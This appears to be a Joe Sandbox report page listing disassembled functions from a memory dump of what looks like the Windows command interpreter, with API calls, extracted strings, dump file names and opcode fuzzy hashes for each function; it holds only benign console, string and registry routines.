API String ID: 1959970872-2167043656
Opcode ID: e8a5d63c360e4c13ef561f3ce3dd80187a3c2d8689f5c743dd181e811bfffbc3
Instruction ID: da3cff2a6f832bd824073dc7aaf11a91906df6067eb55a101782b1e7d9b46f9e
Opcode Fuzzy Hash: e8a5d63c360e4c13ef561f3ce3dd80187a3c2d8689f5c743dd181e811bfffbc3
Instruction Fuzzy Hash: 90417F65E1821386FBA47B1195A8379FAA0BF10747FF45079C94D039E4CFBCA885C631

Function 00007FF7823F91B8 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00007FF7823F91FF
wcsrchr.MSVCRT ref: 00007FF7823F9232
_wcsnicmp.MSVCRT ref: 00007FF7823F9285

Strings

CMD Internal Error %s, xrefs: 00007FF7823F91F8
Null environment, xrefs: 00007FF7823F91F1
%s, xrefs: 00007FF7823F9298

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: _wcsnicmpfprintfwcsrchr
String ID: CMD Internal Error %s$%s$Null environment
API String ID: 3625580822-2781220306
Opcode ID: 9798a54e4fc5b33e689a2c9d89df2130ab496e8d723cbfb9f498f453c0192420
Instruction ID: 7c6acc6491403046f7dedff513f7441e51f2b18674e9a98a650669fee602dfb9
Opcode Fuzzy Hash: 9798a54e4fc5b33e689a2c9d89df2130ab496e8d723cbfb9f498f453c0192420
Instruction Fuzzy Hash: 5F31E521A1864AA1EF10BF42E5201B9F660BF45B96FA44178CD1E17FA5DFBCE485C320

Function 00007FF7823E1FAC Relevance: 9.3, APIs: 6, Instructions: 260COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF7823E200F
wcsspn.MSVCRT ref: 00007FF7823E2226

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: memsetwcsspn
String ID:
API String ID: 3809306610-0
Opcode ID: b301965ff12d262252dd12f41c330d116590c5451c87bac9252232e49858c122
Instruction ID: 51549d999f0816f26f5b8644d7aacf9e9fa5ff55f8bde161b7bfcbec848e1eef
Opcode Fuzzy Hash: b301965ff12d262252dd12f41c330d116590c5451c87bac9252232e49858c122
Instruction Fuzzy Hash: B1B1C576A08B4691EA50EF15E4602B9F7A0FB44B81FE4807ACA4D57F94DFBCE845C720

Function 00007FF7823F8C18 Relevance: 9.1, APIs: 6, Instructions: 145COMMON

Download Yara Rule

APIs

iswdigit.MSVCRT ref: 00007FF7823F8C85
iswdigit.MSVCRT ref: 00007FF7823F8CA2
wcstol.MSVCRT ref: 00007FF7823F8CBF
wcschr.MSVCRT ref: 00007FF7823F8CF0
wcschr.MSVCRT ref: 00007FF7823F8D16
wcschr.MSVCRT ref: 00007FF7823F8D6A

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: wcschr$iswdigit$wcstol
String ID:
API String ID: 3841054028-0
Opcode ID: c8e66ebebd8934775a16318260a5522f8ecbc9a094cbada97be1ab4c749f477c
Instruction ID: 0fba01d4cb4b86c207badb31a2165b7589d8cf0c13993b583ccf1a37fe3315b5
Opcode Fuzzy Hash: c8e66ebebd8934775a16318260a5522f8ecbc9a094cbada97be1ab4c749f477c
Instruction Fuzzy Hash: D2512C27A0475281EF68AB15E4205B9F6A1FF68752BE48136EE5D43AD4DF7CE881C320

Function 00007FF7823D5984 Relevance: 9.1, APIs: 6, Instructions: 142COMMON

Download Yara Rule

APIs

_get_osfhandle.MSVCRT ref: 00007FF7823F3687
WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000000,00008000,?,00000001,00007FF7823D260D), ref: 00007FF7823F36A6
SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000000,00008000,?,00000001,00007FF7823D260D), ref: 00007FF7823F36EB
_get_osfhandle.MSVCRT ref: 00007FF7823F3703
WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000000,00008000,?,00000001,00007FF7823D260D), ref: 00007FF7823F3722

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: Console$Write_get_osfhandle$Mode
String ID:
API String ID: 1066134489-0
Opcode ID: 4c1f695bad35c7bf589eba106c736ecb6e681f2494b966e2c9ca81186bfba4b7
Instruction ID: ca5306ad4356cac1368e7e02622ad61e4e5c6da84d8efe0c6ba5153c0bc561be
Opcode Fuzzy Hash: 4c1f695bad35c7bf589eba106c736ecb6e681f2494b966e2c9ca81186bfba4b7
Instruction Fuzzy Hash: DB51C765B0968297EF646F21E464579E690FF44792FA84079DE0E07F90DFBCE444CB20

Function 00007FF7823D89C0 Relevance: 9.1, APIs: 6, Instructions: 85COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF7823D8A18

Part of subcall function 00007FF7823DCA40: memset.MSVCRT ref: 00007FF7823DCAB3

GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7823D8A62
GetVolumeInformationW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7823D8ABA
??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7823D8AE1
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7823EB3FC
??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7823EB424

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: memset$DriveErrorInformationLastTypeVolume
String ID:
API String ID: 850181435-0
Opcode ID: 41e637cf901b3345656d12757c0875431f92b4df5430d67bb2a32cad95087ec1
Instruction ID: ab6de0db48675df47cc683d9f009f9cfdb5be3c0029cbe4223905549a8417287
Opcode Fuzzy Hash: 41e637cf901b3345656d12757c0875431f92b4df5430d67bb2a32cad95087ec1
Instruction Fuzzy Hash: F341B136608BC1C9E7709F21D8542E9BBA0FB89B45FA44465DA4D47F48CF78D98AC720

Function 00007FF7823E34A0 Relevance: 9.1, APIs: 6, Instructions: 84COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7823E3578: _get_osfhandle.MSVCRT ref: 00007FF7823E3584
Part of subcall function 00007FF7823E3578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF7823D32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7823E359C
Part of subcall function 00007FF7823E3578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF7823D32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7823E35C3
Part of subcall function 00007FF7823E3578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7823D32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7823E35D9
Part of subcall function 00007FF7823E3578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF7823D32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7823E35ED
Part of subcall function 00007FF7823E3578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7823D32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7823E3602

AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00000000,00007FF7823E3491,?,?,?,00007FF7823F4420), ref: 00007FF7823E3514
_get_osfhandle.MSVCRT ref: 00007FF7823E3522
WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,00000000,00007FF7823E3491,?,?,?,00007FF7823F4420), ref: 00007FF7823E3541
ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00000000,00007FF7823E3491,?,?,?,00007FF7823F4420), ref: 00007FF7823E355E

Part of subcall function 00007FF7823E36EC: _get_osfhandle.MSVCRT ref: 00007FF7823E3715
Part of subcall function 00007FF7823E36EC: WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF7823E3770
Part of subcall function 00007FF7823E36EC: WriteFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7823E3791

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: LockShared$_get_osfhandle$AcquireConsoleFileReleaseWrite$ByteCharHandleModeMultiTypeWide
String ID:
API String ID: 4057327938-0
Opcode ID: 88fe3d8dcb1b39454ed35e4d5bc75a190f5634e19a67efeee45e7c5e6c767e8c
Instruction ID: efa13fe1829258778baaaaa58ca54e200d161f884b8a5a0a58bad873d7d18190
Opcode Fuzzy Hash: 88fe3d8dcb1b39454ed35e4d5bc75a190f5634e19a67efeee45e7c5e6c767e8c
Instruction Fuzzy Hash: 94316125F08A4296E7507B26E41017DFAA0FF89B52FE441B9DD0E43F95DEACE848C630

Function 00007FF7823FBE30 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 60COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7823DD3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7823DD46E
Part of subcall function 00007FF7823DD3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7823DD485
Part of subcall function 00007FF7823DD3F0: wcschr.MSVCRT ref: 00007FF7823DD4EE
Part of subcall function 00007FF7823DD3F0: iswspace.MSVCRT ref: 00007FF7823DD54D
Part of subcall function 00007FF7823DD3F0: wcschr.MSVCRT ref: 00007FF7823DD569
Part of subcall function 00007FF7823DD3F0: wcschr.MSVCRT ref: 00007FF7823DD58C

_wcsicmp.MSVCRT ref: 00007FF7823FBE98
_wcsicmp.MSVCRT ref: 00007FF7823FBEC5
_wcsicmp.MSVCRT ref: 00007FF7823FBEFA

Strings

LIST, xrefs: 00007FF7823FBEF0
OFF, xrefs: 00007FF7823FBEBB, 00007FF7823FBEDB
KEYS, xrefs: 00007FF7823FBEE2

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: _wcsicmpwcschr$Heap$AllocProcessiswspace
String ID: KEYS$LIST$OFF
API String ID: 411561164-4129271751
Opcode ID: 9fd236f794765471c688532a78fffa23d2b2533206d05d2e386dcf7da8b9c818
Instruction ID: b8951ee0f8c617afb10807f6b58249041a308d21599d7a132163134c16590677
Opcode Fuzzy Hash: 9fd236f794765471c688532a78fffa23d2b2533206d05d2e386dcf7da8b9c818
Instruction Fuzzy Hash: E92195A0A0860291FA54BB25B450179E662FB58B52FE09279C61E476E5EFBCD884C630

Function 00007FF7823E01B8 Relevance: 9.1, APIs: 6, Instructions: 57COMMON

Download Yara Rule

APIs

_get_osfhandle.MSVCRT ref: 00007FF7823E01C4
GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF7823EE904,?,?,?,?,00000000,00007FF7823E3491,?,?,?,00007FF7823F4420), ref: 00007FF7823E01D6
GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,00007FF7823EE904,?,?,?,?,00000000,00007FF7823E3491,?,?,?,00007FF7823F4420), ref: 00007FF7823E0212
AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF7823EE904,?,?,?,?,00000000,00007FF7823E3491,?,?,?,00007FF7823F4420), ref: 00007FF7823E0228
GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,00007FF7823EE904,?,?,?,?,00000000,00007FF7823E3491,?,?,?,00007FF7823F4420), ref: 00007FF7823E023C
ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF7823EE904,?,?,?,?,00000000,00007FF7823E3491,?,?,?,00007FF7823F4420), ref: 00007FF7823E0251

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: LockShared$AcquireConsoleFileHandleModeReleaseType_get_osfhandle
String ID:
API String ID: 513048808-0
Opcode ID: 9ca52e2f36e6298e0da0b73f4c48285a799823b45280523adb4bff91af1efe56
Instruction ID: e5274936e210dbfb1df6d6455197fbf0e0d4b3d34493897929b7c8e3887eca53
Opcode Fuzzy Hash: 9ca52e2f36e6298e0da0b73f4c48285a799823b45280523adb4bff91af1efe56
Instruction Fuzzy Hash: D3216B25A1868297E6506B61E594278FED0FF49756FB44178DA1E07AD0CEFCA888C720

Function 00007FF7823E3578 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

_get_osfhandle.MSVCRT ref: 00007FF7823E3584
GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF7823D32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7823E359C
GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF7823D32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7823E35C3
AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7823D32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7823E35D9
GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF7823D32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7823E35ED
ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7823D32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7823E3602

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: LockShared$AcquireConsoleFileHandleModeReleaseType_get_osfhandle
String ID:
API String ID: 513048808-0
Opcode ID: 03f01a8104886db99b7aad40b47997af4647daf6f98f1b4f0a1f116e85409c1b
Instruction ID: 0f3aee97d9ddf9b05e809eaedb01eed5d963316ed64bb8a2c90cd7bfb08e7c98
Opcode Fuzzy Hash: 03f01a8104886db99b7aad40b47997af4647daf6f98f1b4f0a1f116e85409c1b
Instruction Fuzzy Hash: 06118125A0864292EB506B25E494038EFA0FB49766FA45378D92E03BD0DEBCD888C720

Function 00007FF7823F711C Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 175COMMON

Download Yara Rule

APIs

OpenSemaphoreW.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF7823F71F9
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7823F720D
OpenSemaphoreW.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF7823F7300

Part of subcall function 00007FF7823F5740: CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?,?,?,?,00007FF7823F75C4,?,?,00000000,00007FF7823F6999,?,?,?,?,?,00007FF7823E8C39), ref: 00007FF7823F5744

Strings

wil, xrefs: 00007FF7823F725E, 00007FF7823F7338
_p0, xrefs: 00007FF7823F71B3

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: OpenSemaphore$CloseErrorHandleLast
String ID: _p0$wil
API String ID: 455305043-1814513734
Opcode ID: 39a27b84dfd8631c9037e55d178cc10ed73d1848b9dee361412bcbd5f2f98ace
Instruction ID: 1041f714448bf5376630eea8658d85bf58a3c57c31ecc90675b25a22cfff586e
Opcode Fuzzy Hash: 39a27b84dfd8631c9037e55d178cc10ed73d1848b9dee361412bcbd5f2f98ace
Instruction Fuzzy Hash: 0361D862B18B42A1EF65EF55E4201B9A3A1FF84B81FE4447ADA0E07B54DF7CD905C720

Function 00007FF7823D1DC0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 139COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF7823D1E21

Part of subcall function 00007FF7823DCA40: memset.MSVCRT ref: 00007FF7823DCAB3

??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7823D1F23

Part of subcall function 00007FF7823DD3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7823DD46E
Part of subcall function 00007FF7823DD3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7823DD485
Part of subcall function 00007FF7823DD3F0: wcschr.MSVCRT ref: 00007FF7823DD4EE
Part of subcall function 00007FF7823DD3F0: iswspace.MSVCRT ref: 00007FF7823DD54D
Part of subcall function 00007FF7823DD3F0: wcschr.MSVCRT ref: 00007FF7823DD569
Part of subcall function 00007FF7823DD3F0: wcschr.MSVCRT ref: 00007FF7823DD58C

iswspace.MSVCRT ref: 00007FF7823F05B0

Strings

%s, xrefs: 00007FF7823D1EF3

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: wcschr$Heapiswspacememset$AllocProcess
String ID: %s
API String ID: 2401724867-3043279178
Opcode ID: 68dfd2aa9ebba26de86c3f9daebedc58b35cbe7b50de7833d958d4803dd9749a
Instruction ID: 1bb73c4abcffcd3b7e2fbceec2820bdb633abaffda297d67db3325387fc88cb7
Opcode Fuzzy Hash: 68dfd2aa9ebba26de86c3f9daebedc58b35cbe7b50de7833d958d4803dd9749a
Instruction Fuzzy Hash: 7B51EA72B0868285EF61AF21D8102F9B3A0FB45B86FA44178DA8D47B94EFBCD445C730

Function 00007FF7823DE260 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 128COMMON

Download Yara Rule

APIs

iswdigit.MSVCRT(?,?,00007FF7823DE157), ref: 00007FF7823DE29D
iswdigit.MSVCRT(00000000,?,?,00007FF7823DE157), ref: 00007FF7823DE310

Strings

GeToken: (%x) '%s', xrefs: 00007FF7823ECC39

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: iswdigit
String ID: GeToken: (%x) '%s'
API String ID: 3849470556-1994581435
Opcode ID: b1c74980886186fc2843b8190b4a082341e47de456d20d62b3525a594f11c7d8
Instruction ID: 53cdf4bcb955954f4548486480cf322aacc08aaa642334cc9623a53cc1773903
Opcode Fuzzy Hash: b1c74980886186fc2843b8190b4a082341e47de456d20d62b3525a594f11c7d8
Instruction Fuzzy Hash: 9A519B31A0865286E764BF16E458279BBA0FF44B46FE08479DA4D43B90DFBCE884C730

Function 00007FF7823F992C Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 121registryCOMMON

Download Yara Rule

APIs

GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7823F9A10
RegEnumKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7823F9994

Part of subcall function 00007FF7823FA73C: RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF7823F9A82), ref: 00007FF7823FA77A
Part of subcall function 00007FF7823FA73C: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF7823F9A82), ref: 00007FF7823FA839
Part of subcall function 00007FF7823FA73C: RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF7823F9A82), ref: 00007FF7823FA850

wcsrchr.MSVCRT ref: 00007FF7823F9A62

Strings

%s=%s, xrefs: 00007FF7823F99E1, 00007FF7823F9AA0
., xrefs: 00007FF7823F99AA

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
